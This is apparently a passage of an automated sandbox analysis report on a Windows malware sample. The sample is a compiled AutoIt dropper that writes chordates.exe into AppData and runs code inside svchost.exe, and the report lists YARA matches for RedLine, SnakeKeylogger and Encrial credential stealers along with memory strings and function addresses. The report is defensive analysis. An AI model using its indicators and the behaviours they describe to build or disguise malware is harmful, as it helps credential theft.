              Source: 00000005.00000002.2183245336.00000000013E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Binary is likely a compiled AutoIt script file
              Source: DSD876543456780000.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: DSD876543456780000.exe, 00000000.00000003.2020898944.00000000036F1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_31249708-3
              Source: DSD876543456780000.exe, 00000000.00000003.2020898944.00000000036F1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_05664397-9
              Source: DSD876543456780000.exe, 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0215ef2a-5
              Source: DSD876543456780000.exe, 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8ef72394-3
              Source: chordates.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: chordates.exe, 00000002.00000002.2040377228.0000000000F22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b1c16028-0
              Source: chordates.exe, 00000002.00000002.2040377228.0000000000F22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a431715a-5
              Source: chordates.exe, 00000005.00000002.2180979584.0000000000F22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_74bd6b52-7
              Source: chordates.exe, 00000005.00000002.2180979584.0000000000F22000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7dc1774e-b
              Source: DSD876543456780000.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_08f96a85-8
              Source: DSD876543456780000.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6c380293-e
              Source: chordates.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b296044c-9
              Source: chordates.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2eefaedd-b
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00C5D5EB
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C51201
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C5E8F6
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00ECE8F6
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C620460_2_00C62046
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF80600_2_00BF8060
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C582980_2_00C58298
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C2E4FF0_2_00C2E4FF
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C2676B0_2_00C2676B
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C848730_2_00C84873
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BFCAF00_2_00BFCAF0
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C1CAA00_2_00C1CAA0
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C0CC390_2_00C0CC39
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C26DD90_2_00C26DD9
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF91C00_2_00BF91C0
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C0B1190_2_00C0B119
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C113940_2_00C11394
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C117060_2_00C11706
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C1781B0_2_00C1781B
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C119B00_2_00C119B0
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF79200_2_00BF7920
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C0997D0_2_00C0997D
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C17A4A0_2_00C17A4A
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C17CA70_2_00C17CA7
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C11C770_2_00C11C77
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C29EEE0_2_00C29EEE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C7BE440_2_00C7BE44
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C11F320_2_00C11F32
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00B636500_2_00B63650
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E680602_2_00E68060
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED20462_2_00ED2046
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EC82982_2_00EC8298
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E9E4FF2_2_00E9E4FF
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E9676B2_2_00E9676B
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EF48732_2_00EF4873
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E6CAF02_2_00E6CAF0
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E8CAA02_2_00E8CAA0
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E7CC392_2_00E7CC39
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E96DD92_2_00E96DD9
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E7D0632_2_00E7D063
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E691C02_2_00E691C0
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E7B1192_2_00E7B119
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E813942_2_00E81394
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E817062_2_00E81706
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E8781B2_2_00E8781B
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E819B02_2_00E819B0
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E7997D2_2_00E7997D
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E679202_2_00E67920
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E87A4A2_2_00E87A4A
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E87CA72_2_00E87CA7
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E81C772_2_00E81C77
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E99EEE2_2_00E99EEE
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EEBE442_2_00EEBE44
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E81F322_2_00E81F32
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_035C36502_2_035C3650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408C603_2_00408C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040DC113_2_0040DC11
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407C3F3_2_00407C3F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418CCC3_2_00418CCC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00406CA03_2_00406CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004028B03_2_004028B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A4BE3_2_0041A4BE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004182443_2_00418244
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004016503_2_00401650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402F203_2_00402F20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004193C43_2_004193C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004187883_2_00418788
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402F893_2_00402F89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402B903_2_00402B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004073A03_2_004073A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BD7B83_2_076BD7B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076B76303_2_076B7630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BA5983_2_076BA598
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BC4E03_2_076BC4E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BD4E03_2_076BD4E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BD20B3_2_076BD20B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BCF303_2_076BCF30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076B6E003_2_076B6E00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BEEE03_2_076BEEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076B2EF83_2_076B2EF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BCC583_2_076BCC58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BC9803_2_076BC980
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076B586F3_2_076B586F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BC6A83_2_076BC6A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BD4EB3_2_076BD4EB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076B43113_2_076B4311
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BEED73_2_076BEED7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BFBA83_2_076BFBA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A50483_2_080A5048
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A9C483_2_080A9C48
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080ACCD03_2_080ACCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A95783_2_080A9578
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A00063_2_080A0006
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A503B3_2_080A503B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AF8343_2_080AF834
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A00403_2_080A0040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AF8403_2_080AF840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AFC883_2_080AFC88
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AFC983_2_080AFC98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080ACCC03_2_080ACCC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AD1193_2_080AD119
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AD1283_2_080AD128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A25733_2_080A2573
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AD5703_2_080AD570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A25803_2_080A2580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AD5803_2_080AD580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AD9C83_2_080AD9C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AD9D83_2_080AD9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080ADE1F3_2_080ADE1F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080ADE303_2_080ADE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AE27D3_2_080AE27D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A1E8A3_2_080A1E8A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AE2883_2_080AE288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A1E983_2_080A1E98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AE6D03_2_080AE6D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AE6E03_2_080AE6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AEB293_2_080AEB29
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A0B233_2_080A0B23
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AEB383_2_080AEB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A0B303_2_080A0B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A93583_2_080A9358
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AEF803_2_080AEF80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A179F3_2_080A179F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AEF903_2_080AEF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A17B03_2_080A17B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A8BB13_2_080A8BB1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A8BC03_2_080A8BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AF3D73_2_080AF3D7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080AF3E83_2_080AF3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_090622603_2_09062260
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0906358C3_2_0906358C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0906BE183_2_0906BE18
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 5_2_013D36505_2_013D3650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00408C606_2_00408C60
